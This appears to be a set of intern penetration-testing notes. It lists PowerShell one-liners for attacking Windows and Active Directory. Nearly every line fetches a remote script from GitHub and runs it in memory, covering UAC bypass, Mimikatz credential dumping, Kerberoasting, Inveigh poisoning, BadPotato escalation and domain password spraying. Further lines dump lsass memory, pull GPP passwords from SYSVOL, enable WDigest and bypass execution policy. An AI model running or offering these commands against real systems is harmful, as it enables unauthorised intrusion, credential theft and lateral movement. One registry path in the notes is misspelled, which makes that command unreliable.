Intern Pentesting notes
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
#Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
#Import Mimikatz Module to run further commands | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
#PowerUp: Privilege escalation checks | |
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks” | |
[+] Example | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1'); Get-DomainUser | Select-Object samaccountname, emailaddress | Export-Csv -Path "H:\Desktop\UserEmails.csv" -NoTypeInformation | |
#Invoke-Inveigh and log output to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y" | |
#Invoke-Kerberoast and provide Hashcat compatible hashes | |
powershell.exe -exec Bypass -C "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" | |
[+] Check users privs | |
net user /domain ticketsamname | |
#Invoke-ShareFinder and print output to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
#Import PowerView Module to run further commands | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
#Invoke-BloodHound with the DCOnly collection method, chosen for speed | |
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/master/SharpHound.ps1');Invoke-BloodHound -CollectionMethod DCOnly" | |
#Find GPP Passwords in SYSVOL | |
findstr /S cpassword $env:logonserver\sysvol\*.xml | |
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe) | |
#Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER] | |
runas /user:DOMAIN\USER /noprofile powershell.exe | |
#Insert reg key to enable Wdigest on newer versions of Windows | |
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1 | |
#Run Winpeas and run all checks | |
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" | |
#Run Rubeus and run triage command | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1'); Invoke-Rubeus triage | |
#Manual Procdump for offline mimikatz | |
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp | |
#Check always install elevated | |
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer | |
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer | |
#BadPotato exploit; requires the impersonation privilege | |
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/IAMinZoho/OFFSEC-PowerShell/main/Invoke-BadPotato.ps1')); Invoke-BadPotato | |
#Watson (rastamouse's next-gen exploit suggester) | |
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/IAMinZoho/OFFSEC-PowerShell/main/Invoke-SharpWatson.ps1')); Invoke-watson | |
#domain password spraying | |
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/shorefall/DomainPasswordSpray/master/DomainPasswordSpray.ps1')); Invoke-DomainPasswordSpray -Password Zomer2023! | |
or | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/shorefall/DomainPasswordSpray/master/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Zomer2023! | |
#WinPwn: collection of assorted Windows exploitation tools | |
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1'); winpwn | |
#adcspwn | |
iex(new-object net.webclient).downloadstring('https://gist.githubusercontent.com/shorefall/ee5fa2aaec8c3d6478ded6ce43986cf8/raw/bea30382ac72f2298d050e86e7ad069919281c37/ADCSpwn.ps1'); Invoke-ADCSPwn | |
#Amnesiac is a post-exploitation framework designed to assist with lateral movement within active directory environments. | |
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac | |
If PowerShell is restricted by execution policy, or there are SSL/TLS errors, add the following first: | |
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex etc etc |